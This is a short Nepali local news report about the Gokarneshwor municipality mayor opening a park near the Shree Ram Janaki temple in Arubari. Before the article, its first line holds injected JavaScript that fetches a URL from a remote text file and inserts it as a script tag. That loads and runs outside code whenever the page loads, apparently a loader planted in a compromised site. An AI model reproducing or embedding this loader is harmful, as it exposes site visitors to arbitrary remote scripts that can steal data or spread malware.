;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
१४ असोज,
काठमाडौँ | गोकर्नेश्वोर नगरपालिका आरुबारीमा अबस्थित श्री राम जानकी मन्दिर परिसरमा बनेको पार्क नगरपालिकाका मेयर सन्तोष चालिसेले उद्घाटन गर्नु भएको छ | बि.स . २०४१ सालमा स्थापना भएको सो मदिर आसपासमा भजन गाउने ठाउको साथै कृयापुत्री भवनको समेत ब्यबस्था रहेको छ भने आज सोहि मन्दिरको नजिक निर्मित पार्क उद्घाटन भएको हो |
कार्यक्रममा गोकर्नेश्वोर नगरपालिका वडा नं ८ का अध्यक्ष मनोज कुमार ढुंगानाको समेत उपस्थिति रहेको थियो | सो मन्दिर संरक्षण समितिका अध्यक्ष दिपक रिसाल रहेका छन् | २०५६ साल देखि सो मन्दिरलाई संरक्षण गर्दै आइरहेका छन |
फेसबुक प्रतिक्रियाहरु